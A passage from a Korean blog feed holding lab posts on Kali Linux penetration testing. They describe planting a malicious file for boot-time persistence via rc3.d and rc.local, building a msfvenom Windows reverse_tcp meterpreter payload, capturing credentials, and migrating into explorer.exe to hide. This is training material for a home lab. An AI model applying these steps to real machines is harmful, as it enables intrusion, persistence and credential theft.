height=&quot;572&quot; data-origin-width=&quot;899&quot; data-origin-height=&quot;572&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;현재 rc3로 동작하는 공격 대상자 리눅스의 부팅시 실행되는 순위이다. login전 S91과 S99사이에 악성 코드를 심어 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;794&quot; data-origin-height=&quot;305&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bMg4xA/btrZjLckVF6/xQqvoo5iFh3B0CcnwsDr60/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bMg4xA/btrZjLckVF6/xQqvoo5iFh3B0CcnwsDr60/img.png&quot; data-alt=&quot;metsploitable은 rc3로 동작한다. wget명령으로 침투한 리눅스에 악성 코드 파일을 rc3.d디렉토리에 다운받아 준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bMg4xA/btrZjLckVF6/xQqvoo5iFh3B0CcnwsDr60/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbMg4xA%2FbtrZjLckVF6%2FxQqvoo5iFh3B0CcnwsDr60%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;794&quot; height=&quot;305&quot; data-origin-width=&quot;794&quot; data-origin-height=&quot;305&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;metsploitable은 rc3로 동작한다. wget명령으로 침투한 리눅스에 악성 코드 파일을 rc3.d디렉토리에 다운받아 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;482&quot; data-origin-height=&quot;138&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bSHYVZ/btrZk9DDxdD/xTNNoGcK9RpkKETZNuzH00/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bSHYVZ/btrZk9DDxdD/xTNNoGcK9RpkKETZNuzH00/img.png&quot; data-alt=&quot;잘 다운받되었는지 확인하고 퍼미션을 a+x, 이름을 S95hack 변경한다. 공격 대상자 를 리부트 하고 공격자 칼리눅스에서 대기를 했지만 반응이 없었다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bSHYVZ/btrZk9DDxdD/xTNNoGcK9RpkKETZNuzH00/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbSHYVZ%2FbtrZk9DDxdD%2FxTNNoGcK9RpkKETZNuzH00%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;482&quot; height=&quot;138&quot; data-origin-width=&quot;482&quot; data-origin-height=&quot;138&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;잘 다운받되었는지 확인하고 퍼미션을 a+x, 이름을 S95hack 변경한다. 공격 대상자 를 리부트 하고 공격자 칼리눅스에서 대기를 했지만 반응이 없었다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dpVYvc/btrZjy5gtqV/Bfhz7RyoHLOddbchQ7cB30/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dpVYvc/btrZjy5gtqV/Bfhz7RyoHLOddbchQ7cB30/img.png&quot; data-origin-width=&quot;531&quot; data-origin-height=&quot;398&quot; data-is-animation=&quot;false&quot; data-widthpercent=&quot;41.36&quot; style=&quot;width: 40.88%; margin-right: 10px;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dpVYvc/btrZjy5gtqV/Bfhz7RyoHLOddbchQ7cB30/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdpVYvc%2FbtrZjy5gtqV%2FBfhz7RyoHLOddbchQ7cB30%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;531&quot; height=&quot;398&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ck8lCu/btrZlavPF0W/y4S30QQsx7TrASc07oTsE1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ck8lCu/btrZlavPF0W/y4S30QQsx7TrASc07oTsE1/img.png&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;424&quot; data-is-animation=&quot;false&quot; style=&quot;width: 57.9572%;&quot; data-widthpercent=&quot;58.64&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ck8lCu/btrZlavPF0W/y4S30QQsx7TrASc07oTsE1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fck8lCu%2FbtrZlavPF0W%2Fy4S30QQsx7TrASc07oTsE1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;802&quot; height=&quot;424&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;다시 악성 코드 파일을 /bin 디렉토리로 옮겨주고 /etc/rc.local 파일에 해당 악성 코드 파일의 위치와 nohup과 &amp;amp; 옵션을 붙여 저장하고 리부트 해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;710&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yvfec/btrZiPs89tv/uf09LPubgmL4NwRIzchQlK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yvfec/btrZiPs89tv/uf09LPubgmL4NwRIzchQlK/img.png&quot; data-alt=&quot;성공적으로 부팅시 악성 코드가 자동으로 실행되었다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yvfec/btrZiPs89tv/uf09LPubgmL4NwRIzchQlK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fyvfec%2FbtrZiPs89tv%2Fuf09LPubgmL4NwRIzchQlK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;903&quot; height=&quot;710&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;710&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;성공적으로 부팅시 악성 코드가 자동으로 실행되었다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/76</guid>
      <comments>https://it-mandarine.tistory.com/76#entry76comment</comments>
      <pubDate>Wed, 15 Feb 2023 11:44:43 +0900</pubDate>
    </item>
    <item>
      <title>악성 코드를 이용한 침투</title>
      <link>https://it-mandarine.tistory.com/75</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;공격대상자 사용자의 실수로 침투가 가능하다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특정한 취약점이 없어도 사용자가 악성 코드를 실행함으로써 침투가 가능해진다. 악성 코드를 공격 대상자 몰래 설치하고 공격 대상자 스스로 실행하기 까지 일련의 과정이 필요하다.&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;구분&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;운영체제&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;IP 주소&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;비고&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;공격 대상자&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;Windows 10&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;192.168.0.20&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;호스트 OS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;공격자&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;칼리리눅스 2022.4&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;192.168.0.29&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;게스트 OS&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;msfvenom 명령어를 이용하여 악성 코드를 생성한다.&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;msfvenom&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; payload (File)&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; -&amp;gt;&amp;nbsp; &amp;nbsp; 배포&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;공격 대상자&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (사용자의 실수)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;IP주소&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;lt;---reverse_tcp(역방향)-------&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Port번호&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;--arch&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; CPU종류(32bit, 64bit)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;--platform&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; O/S(Windows, Linux, Android, Mac)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;--format&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 실행 파일 형식 (exe, elf, ...)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;--payload&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; platform/payload/reverse_tcp&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;--encoders&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Enscryption (숨기는 기능)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;787&quot; data-origin-height=&quot;661&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ccK6Mr/btrZlY2RkZn/CoUk41hiZDY2ZV7iXn2UeK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ccK6Mr/btrZlY2RkZn/CoUk41hiZDY2ZV7iXn2UeK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ccK6Mr/btrZlY2RkZn/CoUk41hiZDY2ZV7iXn2UeK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FccK6Mr%2FbtrZlY2RkZn%2FCoUk41hiZDY2ZV7iXn2UeK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;787&quot; height=&quot;661&quot; data-origin-width=&quot;787&quot; data-origin-height=&quot;661&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;exploit 구문이 없고 payload 구문만 있다. 공격자의 주소 정보는 있지만 공격 대새장자의 IP주소가 없다. 블툭정 다수를 대상으로 사용하기 때문에 공격 대상자의 IP주소 설정을 생략한다. windows/meterpreter/reverse_tcp 구문에서와 같이 공격 대상자가 윈도우 기반의 악성 코드를 실행하면 공격자는 역방향 접속에 의해 미터프리터 환경을 획득할 수 있다. -f c는 C언어 형식의 코드를 생성하라는 의미이다. 생성한 악성 코드는 32비트 기반의 크기는 345바이트이다. 최종 파일의 크기는 1518바이트이다. unsigned char buf[] 배열에 들어간 코드는 쉘코드로 유닉스/리눅스의 쉘 환경에서 실행하는 기계어를 의미한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;906&quot; data-origin-height=&quot;146&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b1IpNu/btrZlrc58z4/TmCldj3rW0FSSZi57YJ6o0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b1IpNu/btrZlrc58z4/TmCldj3rW0FSSZi57YJ6o0/img.png&quot; data-alt=&quot;윈도우 기반의 페이로드 생성&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b1IpNu/btrZlrc58z4/TmCldj3rW0FSSZi57YJ6o0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb1IpNu%2FbtrZlrc58z4%2FTmCldj3rW0FSSZi57YJ6o0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;906&quot; height=&quot;146&quot; data-origin-width=&quot;906&quot; data-origin-height=&quot;146&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;윈도우 기반의 페이로드 생성&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bj82ah/btrZo8RCmZz/ZX7GdKs4KvYpkH8WvS4oQ1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bj82ah/btrZo8RCmZz/ZX7GdKs4KvYpkH8WvS4oQ1/img.png&quot; data-origin-width=&quot;573&quot; data-origin-height=&quot;310&quot; data-is-animation=&quot;false&quot; data-widthpercent=&quot;37.21&quot; style=&quot;width: 36.7787%; margin-right: 10px;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bj82ah/btrZo8RCmZz/ZX7GdKs4KvYpkH8WvS4oQ1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbj82ah%2FbtrZo8RCmZz%2FZX7GdKs4KvYpkH8WvS4oQ1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;573&quot; height=&quot;310&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7mK7A/btrZkyjg0WO/Ivq2ZenfJN7KVvNpbVBfp1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7mK7A/btrZkyjg0WO/Ivq2ZenfJN7KVvNpbVBfp1/img.png&quot; data-origin-width=&quot;446&quot; data-origin-height=&quot;143&quot; data-is-animation=&quot;false&quot; style=&quot;width: 62.0586%;&quot; data-widthpercent=&quot;62.79&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7mK7A/btrZkyjg0WO/Ivq2ZenfJN7KVvNpbVBfp1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7mK7A%2FbtrZkyjg0WO%2FIvq2ZenfJN7KVvNpbVBfp1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;446&quot; height=&quot;143&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;공격 대상자 컴퓨터에 악성 코드를 ftp를 이용하여 다운받아 주고 칼리리눅스에서 자동 스크립트를 만들어 준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;659&quot; data-origin-height=&quot;308&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdoRWY/btrZlqytNU6/jNzam9gCVVp1sckMAT653k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdoRWY/btrZlqytNU6/jNzam9gCVVp1sckMAT653k/img.png&quot; data-alt=&quot;msfconsole -r 스크립트파일을 실행하면 바로 대기상태로 진입한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdoRWY/btrZlqytNU6/jNzam9gCVVp1sckMAT653k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdoRWY%2FbtrZlqytNU6%2FjNzam9gCVVp1sckMAT653k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;659&quot; height=&quot;308&quot; data-origin-width=&quot;659&quot; data-origin-height=&quot;308&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;msfconsole -r 스크립트파일을 실행하면 바로 대기상태로 진입한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;490&quot; data-origin-height=&quot;61&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cqg5wR/btrZkR4a4jc/bVrFkgnUgbR3bllQD20mI1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cqg5wR/btrZkR4a4jc/bVrFkgnUgbR3bllQD20mI1/img.png&quot; data-alt=&quot;ftp를 다운 받은 악성 코드를 관리자 권한으로 실행한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cqg5wR/btrZkR4a4jc/bVrFkgnUgbR3bllQD20mI1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcqg5wR%2FbtrZkR4a4jc%2FbVrFkgnUgbR3bllQD20mI1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;490&quot; height=&quot;61&quot; data-origin-width=&quot;490&quot; data-origin-height=&quot;61&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;ftp를 다운 받은 악성 코드를 관리자 권한으로 실행한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;933&quot; data-origin-height=&quot;439&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c2pK84/btrZhToJgbs/PGQZIq12v4Wq2oo2FK0d5k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c2pK84/btrZhToJgbs/PGQZIq12v4Wq2oo2FK0d5k/img.png&quot; data-alt=&quot;악성코드가 실행되면 msfconsole이 반응하여 미터프리터 환경으로 넘어가지고 공격 대상자에서 사용중인 계정 정보와 비밀번호를 획득할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c2pK84/btrZhToJgbs/PGQZIq12v4Wq2oo2FK0d5k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc2pK84%2FbtrZhToJgbs%2FPGQZIq12v4Wq2oo2FK0d5k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;933&quot; height=&quot;439&quot; data-origin-width=&quot;933&quot; data-origin-height=&quot;439&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;악성코드가 실행되면 msfconsole이 반응하여 미터프리터 환경으로 넘어가지고 공격 대상자에서 사용중인 계정 정보와 비밀번호를 획득할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;백도어 설치, 키로그설치&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;898&quot; data-origin-height=&quot;691&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FoWKx/btrZoqLzoic/1K88p7QwkKYSlTfkeXnyh1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FoWKx/btrZoqLzoic/1K88p7QwkKYSlTfkeXnyh1/img.png&quot; data-alt=&quot;윈도우 작업관리자 프로세스 항목을 알 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FoWKx/btrZoqLzoic/1K88p7QwkKYSlTfkeXnyh1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFoWKx%2FbtrZoqLzoic%2F1K88p7QwkKYSlTfkeXnyh1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;898&quot; height=&quot;691&quot; data-origin-width=&quot;898&quot; data-origin-height=&quot;691&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;윈도우 작업관리자 프로세스 항목을 알 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;743&quot; data-origin-height=&quot;313&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/v2HxG/btrZjqM0KHT/3gXz6zTGKuH0024s1JBkg0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/v2HxG/btrZjqM0KHT/3gXz6zTGKuH0024s1JBkg0/img.png&quot; data-alt=&quot;explorer.exe프로그램에 malware.exe를 migrate하여 윈도우 작업관리자상에 malware.exe가 explorer.exe로 이주하여 보여지지 않게 된다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/v2HxG/btrZjqM0KHT/3gXz6zTGKuH0024s1JBkg0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fv2HxG%2FbtrZjqM0KHT%2F3gXz6zTGKuH0024s1JBkg0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;743&quot; height=&quot;313&quot; data-origin-width=&quot;743&quot; data-origin-height=&quot;313&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;explorer.exe프로그램에 malware.exe를 migrate하여 윈도우 작업관리자상에 malware.exe가 explorer.exe로 이주하여 보여지지 않게 된다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
